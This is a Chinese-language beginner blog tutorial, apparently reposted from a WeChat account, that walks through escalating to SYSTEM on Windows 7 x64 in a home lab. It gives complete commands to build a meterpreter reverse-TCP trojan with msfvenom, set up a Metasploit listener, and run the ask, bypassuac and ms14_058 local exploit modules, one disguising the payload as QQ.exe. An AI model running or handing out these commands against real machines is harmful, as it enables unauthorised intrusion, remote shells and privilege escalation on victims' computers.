针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)

  • A+
所属分类:安全文章

针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)

1.
刚和对象分手,吃完一碗泡面,就来和各位表哥们吹牛皮了,因为表哥们比对象重要哈哈哈哈;
别喷弟弟,由于实验实在本地进行,所以需要各位看官搭建环境



2.
实验材料|:


                1.win7x64虚拟机一台
                2.kali一台
                3.接下来全靠吹牛皮



3.
  在我们拿到一个低权限的shell之后,我们需要提权,所以此篇文章就是针对这种情况的,屁话不多,搭建好两台虚拟机之后就可以开始了
3.1直接提权
我们首先需要制作一个马,先查看kali的ip,我这里是192.168.199.129,


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)


使用msfVENOM制作一个马,使用刚刚得到的ip,输入命令,
msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_tcp lhost=192.168.199.129 lport=4444 -f exe x> shell.exe  
我解读一下,使用msfvenom,制作x64位的win木马,使用windows/x64/meterpreter_reverse_tcp模块,监听主机为192.168.199.129,监听端口为4444.输出格式为exe可执行文件,输出名字为shell.exe,各位表哥看着输入命令
可以看到木马制作成功,接下来就是发送给靶机运行即可


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)

注:
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线4.

使用msfcosole,命令
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.199.129
set lport 4444
exploit


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)


可以看到成功监听。接下来靶机运行之前生成的木马即可拿到shell


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)


已经可以看到sessions了,成功拿到shell,但是此时我们仅仅只是一个管理员权限,我们当然需要system权限


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)


此时进入我们的exploit/windows/local/ask来提权,
输入命令use exploit/windows/local/ask进入该模块,此时只有一个sessions id为1


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)


使用命令 set session 1
set filename QQ.exe
exploit
(此时uac会在win7弹出一个窗口,我们选择是)


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)


即可看到成功获取system,此时我们进入shell,输入whoami,成功拿到system权限,这种提权方式是提高程序运行级别来提高权限


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)


注意:以上过程需要kali和win7处在同一个局域网中,如果不在一个局域网,就需要内网穿透(内网穿透简单来说就是将内网外网通过natapp隧道打通,让内网的数据让外网可以获取
3.1.2
绕过uac提权
我们需要使用use exploit/windows/local/bypassuac模块来绕过uac策略
使用background返回到msf
命令:background
          use exploit/windows/local/bypassuac
          sessions
          set session 6
          exploit即可成功


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)


输入sessions即可看到重新生成了许多session,此时我们只需要选择一个session进入会话getsystem即可


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)


这种提权方法比第一种更好,没有与用户交互的过程,当用户有一定安全基础时第一种方法可能会失效
3.1.3
使用提权漏洞进行提权,先讲之前的session全部清空,留下一个admin权限的session


针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)


因为windows本地提权漏洞挺多的,所以我选择一个来举例子,其实都可以去试一下
首先进入exploit/windows/local/ms14_058_track_popup_menu模块
输入命令set session 1
             exploit
即可执行,直接获取system的session
4.
本人也是菜鸟一只,只是记录一下自己的学习过程,讲了拿到了一个简单shell之后如何反弹到本地并成功提权的过程。

针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)

本文始发于微信公众号(疯猫网络):针对win7x64 getshell后的提权操作(针对小白,大佬轻喷)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: